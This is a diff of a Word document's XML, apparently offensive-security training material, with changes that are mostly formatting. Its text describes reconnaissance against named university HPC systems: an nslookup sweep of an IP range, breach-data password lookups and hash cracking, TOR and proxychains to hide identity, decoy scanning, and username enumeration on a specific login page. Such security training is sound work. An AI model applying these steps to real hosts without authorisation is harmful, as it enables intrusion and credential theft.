+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -7352,6 +10425,36 @@
       <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="table" w:styleId="TableGrid">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:uiPriority w:val="39"/>
+    <w:rsid w:val="00A149DD"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="00D6144D"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/HPC Offensive Security Training Materials.docx
+++ b/HPC Offensive Security Training Materials.docx
@@ -1195,14 +1195,6 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Web Application Attacks</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
         <w:t>How can I protect my organisation?</w:t>
       </w:r>
     </w:p>
@@ -1409,13 +1401,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> rules</w:t>
+      <w:r>
+        <w:t>Sudo rules</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1778,7 +1765,13 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>Linux client side attacks</w:t>
+        <w:t xml:space="preserve">Linux </w:t>
+      </w:r>
+      <w:r>
+        <w:t>client-side</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> attacks</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3743,7 +3736,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> in {1..255}; do nslookup 193.60.196.$i | grep -v find 2&gt;/dev/null; done &gt; hosts.txt</w:t>
+        <w:t xml:space="preserve"> in {</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>1..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>255}; do nslookup 193.60.196.$i | grep -v find 2&gt;/dev/null; done &gt; hosts.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4074,14 +4085,24 @@
       <w:r>
         <w:t xml:space="preserve">Figure </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>5</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText>SEQ Figure \* ARABIC</w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Release date of Apache package to map date of Linux version</w:t>
       </w:r>
@@ -4322,14 +4343,24 @@
       <w:r>
         <w:t xml:space="preserve">Figure </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>6</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText>SEQ Figure \* ARABIC</w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Hosting history of target device</w:t>
       </w:r>
@@ -4421,7 +4452,13 @@
         <w:t xml:space="preserve">target page we are using for reconnaissance purposes. </w:t>
       </w:r>
       <w:r>
-        <w:t>We can see from this page, the target runs Linux; however for further weaponization of payloads</w:t>
+        <w:t xml:space="preserve">We can see from this page, the target runs Linux; </w:t>
+      </w:r>
+      <w:r>
+        <w:t>however,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> for further weaponization of payloads</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, we </w:t>
@@ -4484,14 +4521,24 @@
       <w:r>
         <w:t xml:space="preserve">Figure </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>7</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText>SEQ Figure \* ARABIC</w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Passive reconnaissance of target domain</w:t>
       </w:r>
@@ -4726,6 +4773,9 @@
         <w:lastRenderedPageBreak/>
         <w:t>BreachDirectory</w:t>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> API</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -4801,7 +4851,15 @@
         <w:t xml:space="preserve">password has been retrieved from data breach. </w:t>
       </w:r>
       <w:r>
-        <w:t>To confirm the contents of the hash, a dictionary attack consisting of a wordlist would be required involving the use of tools such as John The Ripper.</w:t>
+        <w:t xml:space="preserve">To confirm the contents of the hash, a dictionary attack consisting of a wordlist would be required involving the use of tools such as John </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Ripper.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -4823,7 +4881,7 @@
       <w:r>
         <w:t xml:space="preserve">at: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId15" w:history="1">
+      <w:hyperlink r:id="rId15">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4933,7 +4991,13 @@
         <w:t xml:space="preserve">interesting </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">sources can be located in order to </w:t>
+        <w:t xml:space="preserve">sources can </w:t>
+      </w:r>
+      <w:r>
+        <w:t>be in</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> order to </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">perform further </w:t>
@@ -5237,6 +5301,9 @@
       </w:pPr>
       <w:r>
         <w:t>TOR</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (The Onion Router)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5421,16 +5488,11 @@
       <w:r>
         <w:t>without problems, this needs to be configured by editing /etc/</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>p</w:t>
       </w:r>
       <w:r>
-        <w:t>roxychains.conf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">roxychains.conf </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">with administrative privileges. </w:t>
@@ -5509,14 +5571,24 @@
       <w:r>
         <w:t xml:space="preserve">Figure </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>8</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText>SEQ Figure \* ARABIC</w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: Configuration of </w:t>
       </w:r>
@@ -5619,14 +5691,24 @@
       <w:r>
         <w:t xml:space="preserve">Figure </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>9</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText>SEQ Figure \* ARABIC</w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: SOCKS 5 proxy to run TOR protocol</w:t>
       </w:r>
@@ -5915,7 +5997,15 @@
         <w:t xml:space="preserve">traced back </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">to ourselves </w:t>
+        <w:t xml:space="preserve">to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ourselves</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">will </w:t>
@@ -6792,7 +6882,15 @@
         <w:t xml:space="preserve">care should be taken to </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">mask ones </w:t>
+        <w:t xml:space="preserve">mask </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ones</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">identity </w:t>
@@ -6940,7 +7038,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">The advantage of using internet based scanners is we can use these machines as decoys to </w:t>
+        <w:t xml:space="preserve">The advantage of using </w:t>
+      </w:r>
+      <w:r>
+        <w:t>internet-based</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> scanners is we can use these machines as decoys to </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">collect information from our target in the form of active reconnaissance. </w:t>
@@ -7300,10 +7404,1277 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The same steps can be followed for further subnets identified which belong to other vulnerability scanners such as the subnet ranges for Shodan, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Natlas</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Zoomeye</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. By blocking these IP addresses from reaching internet facing endpoints it can be possible </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>to block the use of decoy scanning attempts, forcing attackers to attack directly from their own machines</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> or to employ alternative techniques which </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>are not a simple approach which involve vulnerability scanners.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
+        <w:t>External Perimeter Testing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">External perimeter testing involves the use of </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tactics </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which can be used from the external perimeter such as </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">attempting to attack </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">target </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">web applications </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">for purpose of deeper enumeration or command execution which can aid in the process of </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">infiltration. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">External perimeter testing also involves </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the use of </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">attempting to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>probe defences such as firewalls</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">for </w:t>
+      </w:r>
+      <w:r>
+        <w:t>misconfiguratio</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ns which </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">can </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">further educate </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the process of payload weaponization in the event of a client side attack. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Offen</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">sive </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Python</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Probing around upon the VirgoDB component of the Durham Physics infrastructure, an interesting webpage was revealed: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId27" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://129.234.196.27/usage/login.php</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Using any known DiRAC usernames which can be found on the internet it is possible to generate a specific response provided in figure. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2223B607" wp14:editId="4F0AF64B">
+            <wp:extent cx="5731510" cy="2185035"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
+            <wp:docPr id="23" name="Picture 23" descr="Diagram&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="23" name="Picture 23" descr="Diagram&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2185035"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Figure COSMA Usage system message 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Upon testing a random user which did not follow the prefix of “dc-“ with a number, the login system reported back the following message seen in figure. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72978D95" wp14:editId="3B1F9460">
+            <wp:extent cx="5731510" cy="2321560"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
+            <wp:docPr id="24" name="Picture 24"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2321560"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>33</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t>: COSMA Usage system message 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Based upon these login messages, it was clear that this login system could be used for username enumeration.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> From this point, the use of Python can aid us to build an enumeration script by </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">building a wordlist based upon the observed username policy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>based upon results from internet searches. The full script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> was made in two components and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can be found in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>appendix</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>es</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp; 4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Following on from this, these usernames can then be cross-checked against any found SSH keys alongside associated usernames to see if they have access to the COSMA infrastructure or not. The entire reconnaissance for usernames was not conducted to prevent causing a potential DOS on the VirgoDB service, however; previously found usernames were tested and the result can be seen in figure 24. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="458BFB78" wp14:editId="263B0735">
+            <wp:extent cx="2790825" cy="5705475"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="25" name="Picture 25" descr="Graphical user interface, text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="25" name="Picture 25" descr="Graphical user interface, text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
